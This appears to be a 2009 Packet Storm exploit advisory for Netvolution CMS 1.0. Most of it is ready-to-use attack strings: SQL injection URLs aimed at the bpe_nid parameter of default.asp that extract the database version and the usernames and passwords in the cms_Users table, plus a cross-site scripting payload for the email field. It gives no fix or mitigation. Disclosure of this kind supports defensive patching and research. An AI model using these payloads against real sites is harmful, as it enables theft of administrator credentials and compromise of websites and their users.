Netvolution CMS 1.0 XSS / SQL Injection

2009-01-14T00:00:00
ID PACKETSTORM:73848
Type packetstorm
Reporter Ellinas
Modified 2009-01-14T00:00:00

Description

                                        
                                            `###############################################  
Found By : Ellinas aka Greek   
Email: ellinas.security@gmail.com   
Vulnerable Product: CMS netvolution v1.0   
website : www.netvolution.net , www.atcom.gr   
##############################################  
  
SQL Injection  
  
Version Finding:  
  
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5  
  
  
Password Finding:  
  
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20  
(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608  
  
  
Username Finding:  
  
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20  
AND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608  
  
Cross Site Scripting  
  
Set the variable email to >"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>  
  
  
************************  
Many Greetings to:  
  
All Greek Hackers.  
*************************  
  
  
`